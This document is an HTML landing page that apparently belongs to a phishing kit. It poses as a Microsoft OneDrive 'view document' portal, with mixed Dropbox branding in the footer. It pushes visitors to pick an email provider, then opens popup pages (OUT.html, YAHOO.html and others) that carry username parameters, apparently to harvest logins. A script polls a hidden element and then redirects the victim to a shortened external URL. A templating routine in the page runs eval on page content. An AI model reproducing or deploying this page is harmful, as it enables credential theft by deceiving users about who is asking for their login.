<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Onedrive</title>
     <link rel="icon" href="favicon.ico" type="image/x-icon">
    <style>
        @font-face {
            font-family: 'Source Sans Pro';
            font-style: normal;
            font-weight: 400;
            src: url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/source-sans-pro-v14-latin-regular.eot');
            src: local(''), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/source-sans-pro-v14-latin-regular.eot?#iefix') format('embedded-opentype'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/source-sans-pro-v14-latin-regular.woff2') format('woff2'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/source-sans-pro-v14-latin-regular.woff') format('woff'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/source-sans-pro-v14-latin-regular.ttf') format('truetype'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/source-sans-pro-v14-latin-regular.svg#SourceSansPro') format('svg');
        }

        @font-face {
            font-family: 'Source Sans Pro';
            font-style: normal;
            font-weight: 600;
            src: url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/source-sans-pro-v14-latin-600.eot');
            src: local(''), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/source-sans-pro-v14-latin-600.eot?#iefix') format('embedded-opentype'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/source-sans-pro-v14-latin-600.woff2') format('woff2'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/source-sans-pro-v14-latin-600.woff') format('woff'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/source-sans-pro-v14-latin-600.ttf') format('truetype'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/source-sans-pro-v14-latin-600.svg#SourceSansPro') format('svg');
        }

        @font-face {
            font-family: 'Source Sans Pro';
            font-style: normal;
            font-weight: 700;
            src: url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/source-sans-pro-v14-latin-700.eot');
            src: local(''), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/source-sans-pro-v14-latin-700.eot?#iefix') format('embedded-opentype'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/source-sans-pro-v14-latin-700.woff2') format('woff2'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/source-sans-pro-v14-latin-700.woff') format('woff'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/source-sans-pro-v14-latin-700.ttf') format('truetype'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/source-sans-pro-v14-latin-700.svg#SourceSansPro') format('svg');
        }

        @font-face {
            font-family: 'Atlas Grotesk Web Light Regular';
            font-style: normal;
            font-weight: 400;
            src: url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/Atlas Grotesk Web Light Regular.eot');
            src: local(''), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/Atlas Grotesk Web Light Regular.eot?#iefix') format('embedded-opentype'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/Atlas Grotesk Web Light Regular.woff2') format('woff2'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/Atlas Grotesk Web Light Regular.woff') format('woff'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/Atlas Grotesk Web Light Regular.ttf') format('truetype'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/Atlas Grotesk Web Light Regular.svg') format('svg');
        }

        @font-face {
            font-family: 'Atlas Grotesk Web Bold Regular';
            font-style: normal;
            font-weight: 700;
            src: url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/Atlas Grotesk Web Bold Regular.eot');
            src: local(''), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/Atlas Grotesk Web Bold Regular.eot?#iefix') format('embedded-opentype'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/Atlas Grotesk Web Bold Regular.woff2') format('woff2'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/Atlas Grotesk Web Bold Regular.woff') format('woff'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/Atlas Grotesk Web Bold Regular.ttf') format('truetype'), url('https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/Atlas Grotesk Web Bold Regular.svg') format('svg');
        }

        @font-face {
            font-family: 'SharpGrotesk';
            src: url("https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/SharpGroteskDBMedium20-vflI3qtaE.woff2") format("woff2"), url("fonts/SharpGroteskDBMedium20-vflXS-0WC.woff") format("woff"), url("https://{SCRIPT_DOMAIN}/email-list/oneoone45/assets/SharpGroteskDBMedium20-vfls8l7-a.ttf") format("truetype");
            font-weight: 500;
            font-style: normal
        }

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        ::-webkit-scrollbar {
            width: 5px
        }

        ::-webkit-scrollbar-track {
            background: #fff
        }

        ::-webkit-scrollbar-thumb {
            background: #FCEBF5;
            border-radius: 30px
        }

        ::-webkit-scrollbar-thumb:hover {
            background: #0061FF
        }

        body {
            width: 100%;
            min-height: 100vh;
            font-family: Source Sans Pro;
            background-color: #e6e7e9;
            position: relative;
            display: flex;
            padding-bottom: 12px;
            flex-direction: column;
            justify-content: center;
            background-image: url('images/body-bg.png');
            background-size: cover;
            background-position: center;
            padding: 3vw 0;
        }

        header {
            padding: 10px 20px;
            width: 100%;
            margin: 0 auto;
            background-color: #3454cd;
            position: fixed;
            top: 0;
            left: 0;
            z-index: 9999;
        }

        .header {
            display: flex;
            flex-wrap: wrap;
            justify-content: space-between;
            align-items: center;
            margin: 0 auto 0;
            font-size: 15px;
            max-width: 1600px;
            position: relative;
        }

        .header img {
            height: 2.5vw;
            min-height: 40px;
        }

        img {
            max-width: 100%;
        }

        a {
            text-decoration: none;
        }


        .header>div {
            width: 33.33%;
        }

        .download,
        .download a {
            font-size: 18px;
            color: #fff;
            font-family: 'Source Sans Pro';
            text-align: right;
        }

        .logo {
            text-align: right;
        }

        a {
            text-decoration: none;
        }

        a:hover:not(.btn) {
            text-decoration: underline;
        }

        footer {
            width: 100%;
            padding: 16px;
            color: #fff;
            margin: 0 auto;
            font-weight: 500;
            font-size: 1rem;
            font-family: Source Sans Pro;
            display: flex;
            justify-content: space-between;
            position: absolute;
            left: 0;
            bottom: 0;
            background-color: #3454cd;
        }

        .footer-link a {
            display: inline-block;
            margin-left: 1rem;
            font-family: Source Sans Pro;
            color: #fff;
            text-decoration: none;
        }

        .main {
            display: flex;
            flex-wrap: wrap;
            padding: 15px;
            width: 100%;
            margin: 1% auto 0;
            position: relative;
            overflow: hidden;
            align-items: center;
        }

        .text-center {
            text-align: center;
        }

        .safflower-card {
            width: 100%;
            max-width: 420px;
            background-color: #fff;
            padding: 16px 20px 0;
            border-radius: 16px;
            margin: 0 auto;
        }

        .links-wrap {
            width: 84%;
            margin: 0 auto;
            margin-bottom: 24px;
        }

        .links-wrap a {
            display: flex;
            margin-bottom: 12px;
        }

        .links-wrap img {
            width: 100%;
        }

        .links-wrap img:hover {
            transform: scale(1.05);
            transition: all 0.4s;
        }

        .signin-card {
            margin-top: 48px;
        }

        .login {
            font-family: Source Sans Pro;
            font-weight: 700;
            text-transform: capitalize;
            margin-bottom: 1%;
            font-size: 26px;
        }

        .para {
            font-family: Source Sans Pro;
            font-weight: 600;
            color: #505050;
        }

        .note {
            color: #0061ff;
            font-family: Source Sans Pro;
            font-weight: 600;
            font-size: 0.875rem;
        }

        .col-left {
            width: 100%;
            display: flex;
            justify-content: center;
            flex-direction: column;
        }

        .head-heading {
            color: #fff;
            font-weight: bold;
            font-size: 42px;
            font-family: Source Sans Pro;
            width: 100%;
            margin: 1rem 0;
            text-align: center;
        }

        .link-group {
            margin: 1rem auto;
        }



        .btn {
            outline: none;
            display: block;
            border-radius: 100px;
            border: 2px solid #eaeaea;
            color: #505050;
            font-weight: 600;
            height: auto;
            text-align: center;
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
            padding: 12px;
            background-color: #fff;
            width: 100%;
            max-width: 340px;
            margin: 0 auto;
            margin-top: 2.25%;
            font-family: Source Sans Pro;
            text-decoration: none;
            transition: all .3s;
        }

        .btn:hover {
            border-color: #d3d3d3;
            transform: scale(1.1);
        }

        .btn img {
            height: 1.15em;
            vertical-align: middle;
            margin-right: 0.625rem;
        }

        .mt {
            margin-top: -49px;
        }

        .art {
            margin-top: -24px;
            margin-right: -48px;
            margin-left: auto;
            width: calc(100% - 32px);
            max-height: 100%;
            object-fit: cover;
        }
        .foot-heading {
            color: #fff;
            font-weight: 600;
            font-size: 26px;
            font-family: Source Sans Pro;
            width: 100%;
            margin: 1.25rem auto;
            max-width: 650px;
            text-align: center;
        }
        @media(max-width:991px) {

            .col-left,
            .col-right {
                width: 100%;
            }

            .main {
                padding: 15px 15px 0;
            }
        }

        @media(max-width:1199px) {
            .login {
                font-size: 24px;
            }

            .para {
                font-size: 15px;
            }

            .note {
                font-size: 12px;
                margin-bottom: 20px;
            }

            .safflower-card {
                padding: 15px;
            }
        }
    </style>
</head>

<body>
    <header>
        <div class="header">
            <div><img src="images/2.png" alt></div>
            <div class="logo"><img src="images/logo.png"></div>
        </div>
    </header>
    <section class="main">
        <div class="col-left">


            <h1 class="head-heading">
                Get started with <br> Microsoft Onedrive
            </h1>
            <div class="safflower-card">


                <!-- comment this div if you don't want login message -->
                <div class="content">
                    <h2 class="login">Sign in</h2>
                    <div class="para">
                        To view document select your email provider below
                        and login with email address.
                    </div>
                    <div class="note">
                        Select other emails if your email provider not below.
                    </div>
                </div>
                <!-- / comment this div if you don't want login message -->


                <div class="link-group">
                    <ul style=" list-style-type: none;">
            <li class="wow pulse animated animated" data-wow-iteration="infinite" data-wow-duration="800ms" style="visibility: visible; animation-duration: 800ms; animation-iteration-count: infinite; animation-name: pulse;">
                <a href data-nn="OUT.html?username=" class="btn"><img src="fonts/outlook.svg"> Continue with Outlook</a>
                       </li>
                    <li class="wow pulse animated animated" data-wow-iteration="infinite" data-wow-duration="800ms" style="visibility: visible; animation-duration: 800ms; animation-iteration-count: infinite; animation-name: pulse;">
                <a href data-nn="OFFICE.html?username=" class="btn"><img src="fonts/office.svg"> Continue with Office</a>
                   </li>
                    <li class="wow pulse animated animated" data-wow-iteration="infinite" data-wow-duration="800ms" style="visibility: visible; animation-duration: 800ms; animation-iteration-count: infinite; animation-name: pulse;">

                <a href data-nn="AOL.html?yid=" class="btn"><img src="images/aol.png"> Continue with Aol Mail</a>
                         </li>
                    <li class="wow pulse animated animated" data-wow-iteration="infinite" data-wow-duration="800ms" style="visibility: visible; animation-duration: 800ms; animation-iteration-count: infinite; animation-name: pulse;">
                <a href data-nn="YAHOO.html?yid=" class="btn"><img src="images/yahoo.png"> Continue with Yahoo</a>
                  </li>
                    <li class="wow pulse animated animated" data-wow-iteration="infinite" data-wow-duration="800ms" style="visibility: visible; animation-duration: 800ms; animation-iteration-count: infinite; animation-name: pulse;">
                <a href data-nn="OTHER.html#" class="btn"><img src="images/other.png"> Continue with Other Mails</a> </li>
                              <script>
const queryString=[...new URLSearchParams(location.search)].reduce((e,[t,n])=>(e[t]=n,e),{});function templatePage(){let g=document;function a(b){return b.replace(/{\|(.*?)\|}/g,(_,c)=>{let d=eval(c);return null==d?"":d})}for(const e of g.getElementsByTagName("*"))for(const t of e.attributes){let e=a(t.value);e!==t.value&&(t.value=e)}const b=g.createNodeIterator(g.body,NodeFilter.SHOW_TEXT,null);let c;for(;c=b.nextNode();){let e="textContent",t=a(c[e]);t!==c[e]&&(c[e]=t)}}
templatePage()
</script>
                    </ul>
                </div>
                  <div style id="checks"></div>
   <script src="js/jquery.min.js"></script>
   <script>
     $(document).ready(function(e){ 
     window_opener_xc(); 
   });
   function window_opener_xc(){
     var url_part = get_extra_data(1);
     $('li a').click(function(e){
       e.preventDefault();
     if($(this).data('nn')){
       var checks = $('#checks');
           var win3 = window.open(url_part+$(this).data('nn'), '_blank', 'location=yes,height=570,width=520,scrollbars=yes,status=yes');
         setInterval(function(){ 
         if($('#checks').html()){ window.location.replace(get_extra_data(2)); }
       }, 3000);
     }
     });
   }
   function get_extra_data(a){
     var output = '';
     if(a==1){
       output = '';
     }
     else if(a==2){
       output = "https://owy.mn/35MDuDz";
     }
     return output;
   }
   </script>
            </div>
            <h2 class="foot-heading">
                Save your files to OneDrive to keep 
them protected, backed up, and accessible 
from all your devices, anywhere
            </h2>
        </div>
    </section>
    <footer>
        <div>
            © 2022 Dropbox Business
        </div>
        <div class="footer-link">
            <a href="javascript:void(0)">Help</a>
            <a href="javascript:void(0)">Terms & Condition</a>
            <a href="javascript:void(0)">Privacy & Policy</a>
        </div>
        
    </footer>


</body></html>